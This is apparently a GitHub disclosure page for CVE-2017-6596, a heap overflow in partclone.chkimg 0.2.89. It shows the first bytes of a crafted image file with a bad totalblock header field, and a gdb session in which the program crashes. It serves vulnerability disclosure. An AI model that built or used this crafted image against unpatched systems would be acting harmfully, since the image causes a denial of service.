Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Partclone_HeapOverFlow (DoS) - patched

CVE Reference : https://www.cvedetails.com/cve/CVE-2017-6596/

Partclone.chkimg that checks image has a vulnerability with openning a maliciusly craft image file.

It causes Memory crash and Denial-Of-Service.

root@ubuntu:/partclone-0.2.89# hexdump -C hack.img | more

00000000 70 61 72 74 63 6c 6f 6e 65 2d 69 6d 61 67 65 45 |partclone-imageE|

00000010 58 54 46 53 00 00 00 00 00 00 00 00 00 00 30 30 |XTFS..........00|

00000020 30 31 00 00 00 04 00 00 00 20 bf 0c 00 00 00 00 |01....... ......|

00000030 c8 2f 03 00 00 ff ff ff ba 7a 00 00 00 00 00 00 |./.......z......|

00000040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|



(insufficient checking on offset 0x35 ~ 0x37 in image-header.totalblock)



root@ubuntu:/partclone-0.2.89# gdb ./partclone.chkimg

Reading symbols from ./partclone.chkimg...done. (gdb) r -s hack.img

Starting program: partclone-0.2.89/src/partclone.chkimg -s hack.img

[Thread debugging using libthread_db enabled]

Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".

Partclone v0.2.89 http://partclone.org

Starting to check image (hack.img)

we need memory: 137438984768 bytes

image head 4160, bitmap 137438979580, crc 1028 bytes

Calculating bitmap... Please wait... image_hdr : 10000032fc8

totalblock size : 1099511836616

Program received signal SIGSEGV, Segmentation fault.

0x0804ed96 in pc_clear_bit (total=1099511836616, bitmap=0x8057d38, nr=1021504) at bitmap.h:53

53 bitmap[offset] &= ~(1UL << bit);

(gdb) x/x bitmap

0x8057d38: 0xffffffff

(gdb) p bitmap

$1 = (unsigned long *) 0x8057d38

(gdb) x/x bitmap+offset

0x8077000:     Cannot access memory at address 0x8077000 // Out of Heap memory area

(gdb) p offset

$2 = 31922

(gdb)